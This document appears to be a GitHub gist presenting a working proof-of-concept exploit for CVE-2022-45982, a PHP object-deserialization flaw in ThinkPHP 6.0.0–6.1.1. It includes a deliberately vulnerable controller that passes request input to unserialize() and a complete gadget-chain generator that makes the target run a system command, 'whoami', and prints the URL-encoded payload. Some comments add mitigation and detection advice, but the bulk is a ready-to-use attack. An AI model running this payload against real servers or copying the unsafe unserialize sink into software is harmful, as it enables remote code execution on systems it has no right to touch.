@Dar1in9s
Last active February 15, 2023 08:46
CVE-2022-45982

ThinkPHP 6.0.0–6.0.13 and 6.1.0–6.1.1 contain a deserialization vulnerability. It allows attackers to execute arbitrary code via a crafted payload.

First, add a deserialization endpoint (one that passes request input to `unserialize()`), such as:

<?php
namespace app\controller;

use app\BaseController;

class Index extends BaseController
{
    /**
     * Demonstration endpoint that is deliberately vulnerable: this is the
     * sink for the CVE in the gist title.
     *
     * `$payload` (presumably bound from the request by the framework) is passed
     * straight to unserialize(), so whatever object graph the caller supplies is
     * instantiated inside the application.
     *
     * Mitigation: never unserialize untrusted input. Exchange data with
     * json_decode() instead, or at the very least call
     * unserialize($payload, ['allowed_classes' => false]) so no objects can be
     * created from the string.
     */
    public function index($payload)
    {
        unserialize($payload);

    }
}

Now you can generate the payload with:

<?php

namespace think {
    /**
     * Stand-in for the framework's think\Model with only the properties that
     * need to appear in the serialized payload. Property names and visibility
     * must match the real class so PHP maps them onto it at unserialize() time.
     */
    abstract class Model
    {
        private $lazySave = true;
        private $data = ['a' => 'b'];
        private $exists = true;
        protected $withEvent = false;
        protected $readonly = ['a'];
        protected $relationWrite;
        private $relation;
        private $origin = [];

        /**
         * @param mixed $value the next object in the chain (a think\route\Url
         *                     in the generator at the bottom of this file)
         */
        public function __construct($value)
        {
            // Self-reference: the model is its own relation under key 'r'.
            $this->relation = ['r' => $this];
            $this->origin = ["n" => $value];
            // Same key layout as $origin, nested under the relation name 'r'.
            $this->relationWrite = ['r' =>
                ["n" => $value]
            ];
        }
    }

    /** Stub of think\App carrying only the $request property. */
    class App
    {
        protected $request;
    }

    /**
     * Stub of think\Request. The values stored here are what the vulnerable
     * application ends up reading once the object is reconstructed; a
     * defender should note that nothing in this stub is executed on the
     * attacker's side — it is data until the target unserializes it.
     */
    class Request
    {
        protected $mergeParam = true;
        protected $param = ["whoami"];
        protected $filter = "system";
    }
}

namespace think\model {

    use think\Model;

    /**
     * Concrete subclass of the abstract Model stub. The outermost object of
     * the generated payload is an instance of this class (see the unnamed
     * namespace block at the end of the file).
     */
    class Pivot extends Model
    {
    }
}

namespace think\route {

    use think\App;

    /**
     * Stub of think\route\Url. Holds the next chain link in $route and a
     * fresh App stub in $app; $url and $domain are fixed filler values.
     */
    class Url
    {
        protected $url = "";
        protected $domain = "domain";
        protected $route;
        protected $app;

        /**
         * @param mixed $route the next object in the chain (a think\log\Channel
         *                     in the generator below)
         */
        public function __construct($route)
        {
            $this->route = $route;
            $this->app = new App();
        }
    }
}

namespace think\log {
    /**
     * Stub of think\log\Channel. $lazy is forced to false and $log left empty;
     * $logger holds the next chain link.
     */
    class Channel
    {
        protected $lazy = false;
        protected $logger;
        protected $log = [];

        /**
         * @param mixed $logger the next object in the chain (a
         *                      think\session\Store in the generator below)
         */
        public function __construct($logger)
        {
            $this->logger = $logger;
        }
    }
}

namespace think\session {
    /**
     * Stub of think\session\Store. $serialize is set to a callable name and
     * $data to a two-element array; both are plain data in this generator and
     * only take effect on a target that unserializes the payload.
     */
    class Store
    {
        protected $data;
        protected $serialize = ["call_user_func"];
        protected $id = "";

        /**
         * @param mixed $data the next object in the chain (a think\Request in
         *                    the generator below)
         */
        public function __construct($data)
        {
            $this->data = [$data, "param"];
        }
    }
}

namespace {
    // Build the chain innermost-first: each object wraps the previous one.
    // The trailing comments are the author's labels for the magic method the
    // framework reaches at that link when the payload is unserialized.
    //
    // Defender note: the emitted string is a serialized PHP object graph that
    // embeds these framework class names; that is what a detection rule for
    // PHP object injection in request parameters can key on, and why the
    // real fix is to keep unserialize() away from request data entirely.
    $request = new think\Request();         //  param
    $store = new think\session\Store($request);     // save
    $channel = new think\log\Channel($store);     // __call
    $url = new think\route\Url($channel);   // __toString
    $model = new think\model\Pivot($url);   // __destruct
    // URL-encoded so it can be pasted into a query parameter unchanged.
    echo urlencode(serialize($model));
}

